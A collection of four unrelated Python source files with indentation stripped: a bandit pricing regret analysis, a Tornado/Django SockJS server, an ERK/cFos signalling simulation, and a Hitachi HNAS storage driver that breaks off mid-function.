FIXED_BUDGET = [1000 / 3, 1000 / 3, 1000 / 3]
PRICE_PLOT_N_POINTS = 100
MIN_PRICE = 15
MAX_PRICE = 25
FIXED_COST = 12
REWARD_FILE_LIST = ["../../report/project_point_4/Apr17_18-21-54/reward_TS.pkl",
"../../report/project_point_4/Apr17_18-40-58/reward_UCB1.pkl",
"../../report/project_point_4/Apr17_18-47-46/reward_UCBL.pkl",
"../../report/project_point_4/Apr17_20-07-36/reward_UCB1M.pkl",
"../../report/project_point_4/Apr17_21-36-22/reward_UCBLM.pkl",
"../../report/project_point_4/Apr17_18-56-01/reward_EXP3.pkl"]
DAYS_FILE_LIST = ["../../report/project_point_4/Apr17_18-21-54/day_TS.pkl",
"../../report/project_point_4/Apr17_18-40-58/day_UCB1.pkl",
"../../report/project_point_4/Apr17_18-47-46/day_UCBL.pkl",
"../../report/project_point_4/Apr17_20-07-36/day_UCB1M.pkl",
"../../report/project_point_4/Apr17_21-36-22/day_UCBLM.pkl",
"../../report/project_point_4/Apr17_18-56-01/day_EXP3.pkl"]
BANDIT_NAME = ["TS", "UCB1", "UCBL", "UCB1M", "UCBLM", "EXP3"]
n_bandit = len(BANDIT_NAME)
_, folder_path_with_date = handle_folder_creation(result_path=FOLDER_RESULT, retrieve_text_file=False)
assert len(REWARD_FILE_LIST) == len(BANDIT_NAME), "Number of bandits and file list does not match"
assert len(REWARD_FILE_LIST) == len(DAYS_FILE_LIST), "Number of bandits and file list does not match"
# Reading file list
total_reward_list = []
total_day_list = []
for curr_day, _ in enumerate(BANDIT_NAME):
rewards = []
with (open(REWARD_FILE_LIST[curr_day], "rb")) as openfile:
while True:
try:
rewards.append(pickle.load(openfile))
except EOFError:
break
days = []
with (open(DAYS_FILE_LIST[curr_day], "rb")) as openfile:
while True:
try:
days.append(pickle.load(openfile))
except EOFError:
break
rewards = rewards[0]
days = days[0]
total_reward_list.append(rewards)
total_day_list.append(days)
# Compute N-days
n_days = np.inf
for curr_day, day_list_bandit in enumerate(total_day_list):
for j, day_list_exp in enumerate(day_list_bandit):
if len(day_list_exp) < n_days:
n_days = len(day_list_exp)
n_days = n_days - 1
# Compute mean and standard deviation for each day
mean_reward = np.zeros(shape=(n_bandit + 1, n_days))
std_reward = np.zeros(shape=(n_bandit + 1, n_days))
mean_reward[-1] = np.arange(n_days) + 1
std_reward[-1] = np.arange(n_days) + 1
for bandit_idx in range(len(BANDIT_NAME)):
n_exp = len(total_reward_list[bandit_idx])
for curr_day in range(n_days):
daily_values = []
for exp in range(n_exp):
start_user = total_day_list[bandit_idx][exp][curr_day]
end_user = total_day_list[bandit_idx][exp][curr_day + 1]
daily_values.append(np.array(total_reward_list[bandit_idx][exp][start_user:end_user]).sum())
mean_reward[bandit_idx][curr_day] = np.array(daily_values).mean()
std_reward[bandit_idx][curr_day] = np.array(daily_values).std()
mean_df = pd.DataFrame(mean_reward.transpose())
std_df = pd.DataFrame(std_reward.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
mean_df.rename(columns={bandit_idx: "mean_reward_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "day"}, inplace=True)
for bandit_idx, name in enumerate(BANDIT_NAME):
std_df.rename(columns={bandit_idx: "mean_std_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "day"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="day", right_on="day")
total_df.to_csv("{}instant_reward.csv".format(folder_path_with_date), index=False)
# Aggregated plot under a fixed budget
mean_scenario: Scenario = EnvironmentManager.load_scenario(SCENARIO_NAME, get_mean_function=True)
crp_function_list: List[IStochasticFunction] = mean_scenario.get_phases()[0].get_crp_function()
click_function_list: List[IStochasticFunction] = mean_scenario.get_phases()[0].get_n_clicks_function()
context_weight = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)])
context_weight = context_weight / context_weight.sum() # weight to to retrieve the aggregated CRP
aggregated_crp: AggregatedFunction = AggregatedFunction(f_list=crp_function_list, weights=context_weight)
price_point_arr = np.linspace(MIN_PRICE, MAX_PRICE, PRICE_PLOT_N_POINTS)
crp_data = np.zeros(shape=(1 + 1, PRICE_PLOT_N_POINTS))
crp_data[-1] = price_point_arr
for j, point in enumerate(price_point_arr):
crp_data[0][j] = aggregated_crp.draw_sample(point)
crp_df: pd.DataFrame = pd.DataFrame(crp_data.transpose())
crp_df.rename(columns={0: "mean_aggr_crp", 1: "price"}, inplace=True)
crp_df.to_csv("{}aggregated_crp_data.csv".format(folder_path_with_date), index=False)
price_point_arr = np.linspace(MIN_PRICE, MAX_PRICE, PRICE_PLOT_N_POINTS)
profit_data = np.zeros(shape=(1 + 1, PRICE_PLOT_N_POINTS))
profit_data[-1] = price_point_arr
for j, point in enumerate(price_point_arr):
profit_data[0][j] = aggregated_crp.draw_sample(point) * (point - 12)
profit_df: pd.DataFrame = pd.DataFrame(profit_data.transpose())
profit_df.rename(columns={0: "profit_0", 1: "price"}, inplace=True)
profit_df.to_csv("{}aggregated_profit_data.csv".format(folder_path_with_date), index=False)
# Optimal point computation
aggregated_profit: MultipliedStochasticFunction = MultipliedStochasticFunction(aggregated_crp, shift=-FIXED_COST)
min_result = minimize_scalar(aggregated_profit.get_minus_lambda(), bounds=(MIN_PRICE, MAX_PRICE), method="bounded")
optimal_mean_reward_user = aggregated_profit.draw_sample(min_result["x"])
average_daily_users = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)]).sum()
optimal_mean_daily_reward = optimal_mean_reward_user * average_daily_users
print("Optimal mean reward is {}, reached at x={}\n".format(optimal_mean_reward_user, min_result["x"]))
print("Optimal mean daily reward is {}, since there are {} daily users".format(optimal_mean_daily_reward,
average_daily_users))
# Compute regret
if CSV_DAILY_CONT_REGRET:
mean_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
std_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
mean_regret_data[-1] = np.arange(n_days) + 1
std_regret_data[-1] = np.arange(n_days) + 1
for bandit_idx in range(len(BANDIT_NAME)):
n_exp = len(total_reward_list[bandit_idx])
for curr_day in range(n_days):
daily_values = []
for exp in range(n_exp):
end_user = total_day_list[bandit_idx][exp][curr_day + 1]
daily_values.append((curr_day + 1) * optimal_mean_daily_reward - np.array(
total_reward_list[bandit_idx][exp][0:end_user]).sum())
mean_regret_data[bandit_idx][curr_day] = np.array(daily_values).mean()
std_regret_data[bandit_idx][curr_day] = np.array(daily_values).std()
mean_df = pd.DataFrame(mean_regret_data.transpose())
std_df = pd.DataFrame(std_regret_data.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "day"}, inplace=True)
for bandit_idx, name in enumerate(BANDIT_NAME):
std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "day"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="day", right_on="day")
total_df.to_csv("{}daily_regret.csv".format(folder_path_with_date), index=False)
# Regret computation with correct arms (and not all the function)
aggregated_profit: MultipliedStochasticFunction = MultipliedStochasticFunction(aggregated_crp, shift=-FIXED_COST)
points = np.linspace(start=MIN_PRICE, stop=MAX_PRICE, num=N_ARMS_PRICE)
profit_points = np.array([aggregated_profit.draw_sample(x) for x in points])
optimal_discrete_profit = profit_points.max()
average_daily_users = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)]).sum()
optimal_mean_daily_reward_discrete = optimal_discrete_profit * average_daily_users
print("Optimal mean discrete reward is {}, reached for arm index = {}\n".format(optimal_discrete_profit,
profit_points.argmax()))
print("Optimal mean daily reward is {}, since there are {} daily users".format(optimal_mean_daily_reward_discrete,
average_daily_users))
if CSV_DAILY_DISCRETE_REGRET:
mean_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
std_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
mean_regret_data[-1] = np.arange(n_days) + 1
std_regret_data[-1] = np.arange(n_days) + 1
for bandit_idx in range(len(BANDIT_NAME)):
n_exp = len(total_reward_list[bandit_idx])
for curr_day in range(n_days):
daily_values = []
for exp in range(n_exp):
end_user = total_day_list[bandit_idx][exp][curr_day + 1]
daily_values.append((curr_day + 1) * optimal_mean_daily_reward_discrete - np.array(
total_reward_list[bandit_idx][exp][0:end_user]).sum())
mean_regret_data[bandit_idx][curr_day] = np.array(daily_values).mean()
std_regret_data[bandit_idx][curr_day] = np.array(daily_values).std()
mean_df = pd.DataFrame(mean_regret_data.transpose())
std_df = pd.DataFrame(std_regret_data.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "day"}, inplace=True)
for bandit_idx, name in enumerate(BANDIT_NAME):
std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "day"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="day", right_on="day")
total_df.to_csv("{}daily_discrete_regret.csv".format(folder_path_with_date), index=False)
# Compute regret user-wise
if CSV_DISCRETE_USER_REGRET:
total_users = len(total_reward_list[0][0])
mean_data = np.zeros(shape=(n_bandit + 1, total_users))
std_data = np.zeros(shape=(n_bandit + 1, total_users))
mean_data[-1] = np.arange(total_users)
std_data[-1] = np.arange(total_users)
for bandit_idx in range(n_bandit):
n_exp = len(total_reward_list[bandit_idx])
values = [[] for _ in range(total_users)]
for exp in range(n_exp):
curr_exp_value = 0
for user in range(total_users):
curr_exp_value += total_reward_list[bandit_idx][exp][user]
values[user].append((user + 1) * optimal_discrete_profit - curr_exp_value)
for user in range(total_users):
mean_data[bandit_idx][user] = np.array(values[user]).mean()
std_data[bandit_idx][user] = np.array(values[user]).std()
mean_df = pd.DataFrame(mean_data.transpose())
std_df = pd.DataFrame(std_data.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "user"}, inplace=True)
for bandit_idx, name in enumerate(BANDIT_NAME):
std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "user"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="user", right_on="user")
total_df.to_csv("{}discrete_user_regret.csv".format(folder_path_with_date), index=False)
# Compute regret user-wise with real loss
if CSV_CONTINUE_USER_REGRET:
total_users = len(total_reward_list[0][0])
mean_data = np.zeros(shape=(n_bandit+1, total_users))
std_data = np.zeros(shape=(n_bandit+1, total_users))
mean_data[-1] = np.arange(total_users)
std_data[-1] = np.arange(total_users)
for bandit_idx in range(n_bandit):
n_exp = len(total_reward_list[bandit_idx])
values = [[] for _ in range(total_users)]
for exp in range(n_exp):
curr_exp_value = 0
for user in range(total_users):
curr_exp_value += total_reward_list[bandit_idx][exp][user]
values[user].append((user + 1) * optimal_mean_reward_user - curr_exp_value)
for user in range(total_users):
mean_data[bandit_idx][user] = np.array(values[user]).mean()
std_data[bandit_idx][user] = np.array(values[user]).std()
mean_df = pd.DataFrame(mean_data.transpose())
std_df = pd.DataFrame(std_data.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "user"}, inplace=True)
for bandit_idx, name in enumerate(BANDIT_NAME):
std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "user"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="user", right_on="user")
total_df.to_csv("{}cont_user_regret.csv".format(folder_path_with_date), index=False)
|
from game.utils import config
import os
import logging
import json
import django.core.handlers.wsgi
from django.conf import settings
from tornado import ioloop
import tornado.ioloop
import tornado.web
import tornado.wsgi
import tornado.httpserver
import django.utils.importlib
import django.contrib.auth
from django.contrib.auth.models import AnonymousUser
from sockjs.tornado import SockJSConnection
from sockjs.tornado import SockJSRouter
import game.channels
logger = logging.getLogger(__name__)
class BroadcastConnection(SockJSConnection):
#TODO csrf
clients = set()
def __init__(self, session):
super().__init__(session)
self.user = None
def on_open(self, info):
self.clients.add(self)
self.timeout = ioloop.PeriodicCallback(self._ticker, 1000)
self.timeout.start()
class DjangoRequest(object):
def __init__(self, session):
self.session = session
#get Django session
engine = django.utils.importlib.import_module(django.conf.settings.SESSION_ENGINE)
cookie_name = django.conf.settings.SESSION_COOKIE_NAME
try:
session_key = info.get_cookie(cookie_name).value
except AttributeError:
self.user = AnonymousUser()
return
session = engine.SessionStore(session_key)
session = session.load()
request = DjangoRequest(session)
self.user = django.contrib.auth.get_user(request)
def on_message(self, msg):
if msg == "ping":
self.send("pong")
return
data = json.loads(msg)
command = data['command']
if command == "subscribe":
self.handle_subscribe(data)
elif command == "unsubscribe":
self.handle_unsubscribe(data)
def handle_subscribe(self, params):
logger.debug("Subscribing, params: ", params)
channel_class, channel_name = params['channel'].split('.')
try:
channel = game.channels.Channel.channels[channel_class]
except KeyError:
#TODO report error to the client
logger.error("Channel class not found: %s" % channel_class)
return
channel.subscribe(self.user, self, channel_name)
def handle_unsubscribe(self, params):
logger.debug("unsubscribing, params: ", params)
channel_class, channel_name = params['channel'].split('.')
channel = game.channels.Channel.channels[channel_class]
channel.unsubscribe(self.user, self, channel_name)
def on_close(self):
self.clients.remove(self)
#channel.remove_connections(self, channel_name)
#TODO remove all channel connections
self.timeout.stop()
def _ticker(self):
self.send('pong')
class NoCacheStaticFileHandler(tornado.web.StaticFileHandler):
def set_extra_headers(self, path):
self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
def main():
wsgi_app = tornado.wsgi.WSGIContainer(django.core.handlers.wsgi.WSGIHandler())
broadcast_router = SockJSRouter(BroadcastConnection, '/broadcast')
app = tornado.web.Application(
broadcast_router.urls +
[
(r"/static/angular/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "angular")}),
(r"/static/js/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "js")}),
(r"/static/css/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "css")}),
(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated')}),
(r"/robots.txt()$", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "robots.txt")}),
#(r"/()$", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "angular", "index.html")}),
('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
],
debug=config.debug,
)
server = tornado.httpserver.HTTPServer(app)
server.listen(config.port, config.address)
logger.info("listening at: http://%s:%s", config.address, config.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
import numpy as np
from .name2idx import C, V
from .set_model import diffeq
from .solver import solveode, get_steady_state
observables = [
'Phosphorylated_MEKc',
'Phosphorylated_ERKc',
'Phosphorylated_RSKw',
'Phosphorylated_CREBw',
'dusp_mRNA',
'cfos_mRNA',
'cFos_Protein',
'Phosphorylated_cFos',
]
class NumericalSimulation(object):
tspan = [0, 5400] # [start, end] (Unit time: 1 sec.)
t = np.arange(tspan[0], tspan[-1]+1)/60. # sec. -> min. (plot_func.py)
conditions = ['EGF', 'HRG']
simulations = np.empty((len(observables), len(t), len(conditions)))
def simulate(self, x, y0):
# get steady state
x[C.Ligand] = x[C.no_ligand] # No ligand
(T_steady_state, Y_steady_state) = get_steady_state(
diffeq, y0, self.tspan, tuple(x)
)
if T_steady_state < self.tspan[-1]:
return False
else:
y0 = Y_steady_state[:]
# add ligand
for i, condition in enumerate(self.conditions):
if condition == 'EGF':
x[C.Ligand] = x[C.EGF]
elif condition == 'HRG':
x[C.Ligand] = x[C.HRG]
(T, Y) = solveode(diffeq, y0, self.tspan, tuple(x))
if T[-1] < self.tspan[-1]:
return False
else:
self.simulations[observables.index('Phosphorylated_MEKc'), :, i] = (
Y[:, V.ppMEKc]
)
self.simulations[observables.index('Phosphorylated_ERKc'), :, i] = (
Y[:, V.pERKc] + Y[:, V.ppERKc]
)
self.simulations[observables.index('Phosphorylated_RSKw'), :, i] = (
Y[:, V.pRSKc] + Y[:, V.pRSKn]*(x[C.Vn]/x[C.Vc])
)
self.simulations[observables.index('Phosphorylated_CREBw'), :, i] = (
Y[:, V.pCREBn]*(x[C.Vn]/x[C.Vc])
)
self.simulations[observables.index('dusp_mRNA'), :, i] = (
Y[:, V.duspmRNAc]
)
self.simulations[observables.index('cfos_mRNA'), :, i] = (
Y[:, V.cfosmRNAc]
)
self.simulations[observables.index('cFos_Protein'), :, i] = (
(Y[:, V.pcFOSn] + Y[:, V.cFOSn])*(x[C.Vn]/x[C.Vc])
+ Y[:, V.cFOSc] + Y[:, V.pcFOSc]
)
self.simulations[observables.index('Phosphorylated_cFos'), :, i] = (
Y[:, V.pcFOSn]*(x[C.Vn]/x[C.Vc]) + Y[:, V.pcFOSc]
)
class ExperimentalData(object):
experiments = [None]*len(observables)
t2 = [0, 300, 600, 900, 1800, 2700, 3600, 5400]
experiments[observables.index('Phosphorylated_MEKc')] = {
'EGF': [0.000, 0.773, 0.439, 0.252, 0.130, 0.087, 0.080, 0.066],
'HRG': [0.000, 0.865, 1.000, 0.837, 0.884, 0.920, 0.875, 0.789],
}
experiments[observables.index('Phosphorylated_ERKc')] = {
'EGF': [0.000, 0.867, 0.799, 0.494, 0.313, 0.266, 0.200, 0.194],
'HRG': [0.000, 0.848, 1.000, 0.971, 0.950, 0.812, 0.747, 0.595],
}
experiments[observables.index('Phosphorylated_RSKw')] = {
'EGF': [0, 0.814, 0.812, 0.450, 0.151, 0.059, 0.038, 0.030],
'HRG': [0, 0.953, 1.000, 0.844, 0.935, 0.868, 0.779, 0.558],
}
experiments[observables.index('Phosphorylated_cFos')] = {
'EGF': [0, 0.060, 0.109, 0.083, 0.068, 0.049, 0.027, 0.017],
'HRG': [0, 0.145, 0.177, 0.158, 0.598, 1.000, 0.852, 0.431],
}
# --------------------------------------------------------------------------
t3 = [0, 600, 1800, 3600, 5400]
experiments[observables.index('Phosphorylated_CREBw')] = {
'EGF': [0, 0.446, 0.030, 0.000, 0.000],
'HRG': [0, 1.000, 0.668, 0.460, 0.340],
}
# --------------------------------------------------------------------------
t4 = [0, 600, 1200, 1800, 2700, 3600, 5400]
experiments[observables.index('cfos_mRNA')] = {
'EGF': [0, 0.181, 0.476, 0.518, 0.174, 0.026, 0.000],
'HRG': [0, 0.353, 0.861, 1.000, 0.637, 0.300, 0.059],
}
# --------------------------------------------------------------------------
t5 = [0, 900, 1800, 2700, 3600, 5400]
experiments[observables.index('cFos_Protein')] = {
'EGF': [0, 0.078, 0.216, 0.240, 0.320, 0.235],
'HRG': [0, 0.089, 0.552, 0.861, 1.000, 0.698],
}
experiments[observables.index('dusp_mRNA')] = {
'EGF': [0.000, 0.177, 0.331, 0.214, 0.177, 0.231],
'HRG': [0.000, 0.221, 0.750, 1.000, 0.960, 0.934],
}
def get_timepoint(self, obs_idx):
if obs_idx in [
observables.index('Phosphorylated_MEKc'),
observables.index('Phosphorylated_ERKc'),
observables.index('Phosphorylated_RSKw'),
observables.index('Phosphorylated_cFos'),
]:
exp_t = self.t2
elif obs_idx == observables.index('Phosphorylated_CREBw'):
exp_t = self.t3
elif obs_idx == observables.index('cfos_mRNA'):
exp_t = self.t4
elif obs_idx in [
observables.index('cFos_Protein'),
observables.index('dusp_mRNA'),
]:
exp_t = self.t5
return list(map(int, exp_t))
|
# Copyright 2021 The SODA Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WarrayANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import time
import eventlet
import six
from oslo_log import log as logging
from oslo_utils import units
from delfin import exception, utils
from delfin.common import constants
from delfin.drivers.utils import ssh_client
from delfin.drivers.hitachi.hnas import constants as constant
from delfin.drivers.utils.tools import Tools
LOG = logging.getLogger(__name__)
class NasHandler(object):
def __init__(self, **kwargs):
self.ssh_pool = ssh_client.SSHPool(**kwargs)
self.evs_list = []
def ssh_do_exec(self, command_list):
res = None
with eventlet.Timeout(60, False):
res = self.ssh_pool.do_exec_shell(command_list)
while 'Failed to establish SSC connection' in res:
res = self.ssh_pool.do_exec_shell(command_list)
if res:
return res
else:
raise \
exception.ConnectTimeout(
'Failed to establish SSC connection from hitachi hnas'
)
def login(self):
try:
result = self.ssh_do_exec(['cluster-show -y'])
if 'EVS' not in result:
raise exception.InvalidIpOrPort()
except Exception as e:
LOG.error("Failed to login hnas %s" %
(six.text_type(e)))
raise e
@staticmethod
def format_data_to_map(
value_info,
value_key,
line='\r\n',
split=":",
split_key=None):
map_list = []
detail_array = value_info.split(line)
value_map = {}
for detail in detail_array:
if detail:
string_info = detail.split(split)
key = string_info[0].replace(' ', '')
value = ''
if len(string_info) > 1:
for string in string_info[1:]:
value += string.\
replace('""', '').\
replace('\'', '').\
replace(' ', '')
if value_map.get(key):
value_map[key + '1'] = value
else:
value_map[key] = value
else:
if value_key in value_map:
map_list.append(value_map)
value_map = {}
if split_key and split_key in detail:
if value_key in value_map:
map_list.append(value_map)
value_map = {}
if value_key in value_map:
map_list.append(value_map)
return map_list
@staticmethod
def get_table_data(values, is_alert=False):
header_index = 0
table = values.split('\r\n')
for i in range(len(table)):
if constant.DATA_HEAD_PATTERN.search(table[i]):
header_index = i
if is_alert and constant.ALERT_HEAD_PATTERN.search(table[i]):
header_index = i
return table[(header_index + 1):]
return table[(header_index + 1):]
def format_storage_info(self, storage_map_list,
model_map_list, version_map_list,
location_map_list, serial_map_list):
if not storage_map_list:
raise exception.StorageBackendException(
'Failed to get HNAS storage')
model_map = model_map_list[-1] if model_map_list else {}
model = model_map.get('Model')
model = model.replace('HNAS', 'HNAS ')
version_map = version_map_list[-1] if version_map_list else {}
location_map = location_map_list[-1] if location_map_list else {}
serial_map = serial_map_list[-1] if serial_map_list else {}
version = version_map.get("Software").split('(')
serial_number = serial_map.get("Hardware").split('(')[-1]
storage_map = storage_map_list[-1]
disk_list = self.get_disk(None)
total_capacity = \
raw_capacity = \
used_capacity = \
free_capacity = 0
for disk in disk_list:
raw_capacity += disk['capacity']
status = \
constant.CLUSTER_STATUS.get(storage_map['ClusterHealth'])
pool_list = self.get_pool(None)
for pool in pool_list:
total_capacity += pool['total_capacity']
used_capacity += pool['used_capacity']
free_capacity += pool['free_capacity']
storage_model = {
"name": storage_map['ClusterName'],
"vendor": constant.STORAGE_VENDOR,
"model": model,
"status": status,
"serial_number": serial_number.replace(')', ''),
"firmware_version": version[0],
"location": location_map['Location'],
"total_capacity": total_capacity,
"raw_capacity": raw_capacity,
"used_capacity": used_capacity,
"free_capacity": free_capacity
}
return storage_model
def get_storage(self):
try:
storage_info = self.ssh_do_exec([constant.STORAGE_INFO_COMMAND])
model_info = self.ssh_do_exec([constant.STORAGE_MODEL_COMMAND])
location_info = self.ssh_do_exec(([constant.LOCATION_COMMAND]))
model_map_list = \
self.format_data_to_map(model_info, 'Model')
storage_map_list = \
self.format_data_to_map(
storage_info, 'ClusterName', split="=")
version_map_list = \
self.format_data_to_map(model_info, 'Software')
location_map_list = \
self.format_data_to_map(location_info, 'Location')
serial_map_list =\
self.format_data_to_map(model_info, 'Hardware')
storage_model = \
self.format_storage_info(
storage_map_list, model_map_list, version_map_list,
location_map_list, serial_map_list)
return storage_model
except exception.DelfinException as e:
err_msg = "Failed to get storage from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def get_disk(self, storage_id):
try:
disk_info = self.ssh_do_exec([constant.DISK_INFO_COMMAND])
disk_map_list = \
self.format_data_to_map(disk_info, 'Capacity')
disks_list = []
for disk_map in disk_map_list:
if 'Status' in disk_map:
size = disk_map['Capacity'].split('GiB')[0] + "GB"
status = constants.DiskStatus.NORMAL \
if disk_map['Status'] == 'OK' \
else constants.DiskStatus.ABNORMAL
disk_type = disk_map['Type']
type_array = disk_type.split(';')
model = vendor = version = None
if len(type_array) > constant.DISK_INDEX['type_len']:
model = \
type_array[constant.DISK_INDEX[
'model_index']].replace('Model', '')
vendor = \
type_array[constant.DISK_INDEX[
'vendor_index']].replace('Make', '')
version = \
type_array[constant.DISK_INDEX[
'version_index']].replace('Revision', '')
pool_id = disk_map.get('Usedinspan')
serial_number = disk_map['Luid'].split(']')[-1]
if pool_id:
pool_id = pool_id.split('(')[0]
disk_model = {
'name': disk_map['HDSdevname'],
'storage_id': storage_id,
'native_disk_id': disk_map['DeviceID'],
'serial_number': serial_number,
'manufacturer': vendor,
'model': model,
'firmware': version,
'capacity': int(Tools.get_capacity_size(size)),
'status': status,
'native_disk_group_id': pool_id
}
disks_list.append(disk_model)
return disks_list
except exception.DelfinException as e:
err_msg = "Failed to get disk from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get disk from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def get_pool_size(self):
size_info = self.ssh_do_exec([constant.POOL_SIZE_COMMAND])
size_array = size_info.split('\r\n')
size_map = {}
pool_name = None
for size in size_array:
if 'Span ' in size:
pool_name = size.split()[-1].replace(':', '')
size_map[pool_name] = 0
if '[Free space]' in size:
free_array = size.split()
if len(free_array) > 2:
free_size = free_array[0].replace('GiB', 'GB')
size_map[pool_name] += Tools.get_capacity_size(free_size)
return size_map
def get_pool(self, storage_id):
try:
pool_info = self.ssh_do_exec([constant.POOL_INFO_COMMAND])
pool_list = []
pool_array = self.get_table_data(pool_info)
size_map = self.get_pool_size()
for pool in pool_array:
value_array = pool.split()
if len(value_array) == constant.POOL_INDEX['pool_len']:
total_capacity = \
Tools.get_capacity_size(
value_array[constant.POOL_INDEX['total_index']] +
'GB')
free_capacity = \
size_map.get(
value_array[constant.POOL_INDEX['free_index']],
total_capacity)
status = constants.StoragePoolStatus.NORMAL \
if value_array[
constant.POOL_INDEX['status_index']] == 'Yes' \
else constants.StoragePoolStatus.ABNORMAL
pool_model = {
'name': value_array[constant.POOL_INDEX['name_index']],
'storage_id': storage_id,
'native_storage_pool_id': value_array[
constant.POOL_INDEX['name_index']],
'status': status,
'storage_type': constants.StorageType.FILE,
'total_capacity': total_capacity,
'used_capacity': total_capacity - free_capacity,
'free_capacity': free_capacity,
}
pool_list.append(pool_model)
return pool_list
except exception.DelfinException as e:
err_msg = "Failed to get pool from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get pool from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def list_controllers(self, storage_id):
try:
controller_list = []
node_info = self.ssh_do_exec([constant.CONTROLLER_INFO_COMMAND])
nodes_array = self.get_table_data(node_info)
for nodes in nodes_array:
node = nodes.split()
if len(node) > constant.NODE_INDEX['node_len']:
status = constants.ControllerStatus.NORMAL \
if node[
constant.NODE_INDEX[
'status_index']] == 'ONLINE' \
else constants.ControllerStatus.OFFLINE
controller_model = {
'name': node[constant.NODE_INDEX['name_index']],
'storage_id': storage_id,
'native_controller_id': node[
constant.NODE_INDEX['id_index']],
'status': status
}
controller_list.append(controller_model)
return controller_list
except exception.DelfinException as e:
err_msg = "Failed to get controllers from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get controllers from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
@staticmethod
def format_alert_list(alert_array, query_para):
alert_list = []
alert_model = {}
for alert in alert_array:
if alert and 'CAUSE' not in alert:
alert_data = alert.split()
if len(alert_data) > constant.ALERT_INDEX['alert_len'] \
and alert_data[
constant.ALERT_INDEX['severity_index']] \
in constant.SEVERITY_MAP:
occur_time = \
alert_data[constant.ALERT_INDEX['year_index']] + \
' ' + alert_data[constant.ALERT_INDEX[
'time_index']].split("+")[0]
occur_time = \
int(time.mktime(time.strptime(
occur_time, constant.TIME_TYPE))) * 1000
if not query_para or \
(int(query_para['begin_time'])
<= occur_time
<= int(query_para['end_time'])):
description = ''
for i in range(4, len(alert_data)):
description += alert_data[i] + ' '
severity = \
constant.SEVERITY_MAP.get(
alert_data[constant.ALERT_INDEX[
'severity_index']])
alert_model['alert_id'] = \
alert_data[constant.ALERT_INDEX['id_index']]
alert_model['alert_name'] = \
alert_data[constant.ALERT_INDEX['id_index']]
alert_model['severity'] = severity
alert_model['category'] = constants.Category.FAULT
alert_model['type'] = \
constants.EventType.EQUIPMENT_ALARM
alert_model['occur_time'] = occur_time
alert_model['description'] = description.lstrip()
alert_model['match_key'] = \
hashlib.md5(
(alert_data[constant.ALERT_INDEX['id_index']]
+ severity
+ description).encode()).hexdigest()
alert_model['resource_type'] = \
constants.DEFAULT_RESOURCE_TYPE
if alert and alert_model and 'CAUSE' in alert:
alert_data = alert.split(':')
alert_model['location'] = alert_data[-1]
if not alert:
